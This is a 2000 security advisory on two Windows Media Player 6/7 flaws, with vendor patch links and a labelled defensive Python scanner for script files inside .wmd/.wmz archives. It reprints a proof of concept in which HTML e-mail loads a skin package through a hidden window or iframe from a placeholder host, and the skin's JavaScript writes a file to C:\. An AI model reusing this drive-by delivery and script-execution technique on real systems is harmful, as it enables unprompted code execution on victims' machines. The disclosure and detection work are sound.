Reported November 23, 2000 by @Stake and GFI

VERSIONS AFFECTED
  • Windows Media Player 7
  • Windows Media Player 6

DESCRIPTION

Two vulnerabilities in Microsoft Windows Media Player have been discovered.  The first vulnerability allows the execution of arbitrary code.  By embedding a JavaScript (.js) file within a Media Player skin file (.wmz), a malicious user can cause Media Player to run the code automatically.  Media Player does not prompt the user before running code that appears to be a Media Player file.

The second vulnerability is a buffer overrun.  The problem lies in how Media Player deals with the .ASX file format.  This vulnerability can allow the execution of arbitrary code.

DEMONSTRATION

The following demonstration for the first vulnerability was provided by GFI:

----[Proof of concept Exploit:

<Embedded within an HTML file or e-mail>

E-mail Example 1.

<head>
<script language="JavaScript">
<!--
function MM_openBrWindow(theURL,winName,features) { //v2.0
alert('This exploit will now open a new window\n' +
      'and automatically download the wmd file\n' +
      'and execute it. This will create a file named\n' +
      'gfiseclab.txt in your C:\\');
window.open(theURL,winName,features);
}
//-->
</script>
</head>
<body bgcolor="#FFFFFF"
onLoad="MM_openBrWindow('http://website/test.wmd','','width=0,height=0')">
</Embedded within an HTML e-mail>

E-mail Example 2.

<html>
<body>
<script>
alert('This exploit will now open a new window \n and automatically download ' +
      'the wmd file \n and execute it. This will create a file named \n ' +
      'gfiseclab.txt in your C:\\')</script>
<iframe src="http://website/test.wmd"></iframe></body>
</html>
-------------------------------------

test.wmd is a compressed zip file which contains the following files:

* test.asx: metafile which points to an mpg file and the exploit skin file.
* test.mpg: an example MPEG movie.
* test.wmz: the exploit skin file.

test.wmz is also a compressed zip file containing:

* test.js: our JavaScript, which contains the following code

************************************

var fso, f1;
// Scripting.FileSystemObject is reachable from the skin script context
fso = new ActiveXObject("Scripting.FileSystemObject");
f1 = fso.CreateTextFile("C:\\gfiseclab.txt", true);
function onload(){
playAgain();
}

************************************

* test.wms: another metafile which calls test.js
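A defender's check for the archive layout described above, written as an added example that is not part of the advisory or of GFI's or @Stake's material: it walks a .wmd container, descends into any .wmz skin archive inside it, and reports script members (.js, .wms). The sample .wmd is constructed inline with the file names from the advisory and contains placeholder content only.

```python
import io
import zipfile

# Member types named in the advisory: script/skin-control files are the
# ones that Media Player 6/7 would run without prompting.
SCRIPT_EXTS = (".js", ".wms")
# Both .wmd (download package) and .wmz (skin) are zip containers.
ARCHIVE_EXTS = (".wmd", ".wmz")


def find_embedded_scripts(data: bytes, path: str = "") -> list:
    """Recursively walk a zip blob and return archive paths of script members.

    Nested .wmd/.wmz members that are themselves zips are descended into;
    anything else is skipped.
    """
    hits = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = info.filename
            full = f"{path}/{name}" if path else name
            lower = name.lower()
            if lower.endswith(SCRIPT_EXTS):
                hits.append(full)
            elif lower.endswith(ARCHIVE_EXTS):
                inner = zf.read(name)
                if zipfile.is_zipfile(io.BytesIO(inner)):
                    hits.extend(find_embedded_scripts(inner, full))
    return hits


def build_sample_wmd() -> bytes:
    """Constructed sample mirroring the advisory's test.wmd layout.

    Placeholder bytes only: no real media and no script payload.
    """
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as z:
        z.writestr("test.js", "// placeholder skin script\n")
        z.writestr("test.wms", "<!-- placeholder skin metafile -->\n")
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as z:
        z.writestr("test.asx", '<ASX version="3.0"></ASX>\n')
        z.writestr("test.mpg", b"\x00" * 16)
        z.writestr("test.wmz", inner.getvalue())
    return outer.getvalue()


if __name__ == "__main__":
    for hit in find_embedded_scripts(build_sample_wmd()):
        print("script member found:", hit)
```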

----------------------------------------------------

The proof of concept for the second vulnerability was provided by @Stake:

http://www.atstake.com/research/advisories/2000/asx-bufferoverrun.zip

VENDOR RESPONSE

Microsoft has released security bulletin MS00-090, with patches to repair the vulnerabilities.

Windows Media Player 6.4:

http://www.microsoft.com/Downloads/Release.asp?ReleaseID=26069

Windows Media Player 7:

http://www.microsoft.com/Downloads/Release.asp?ReleaseID=26067

CREDIT
Discovered by @Stake and GFI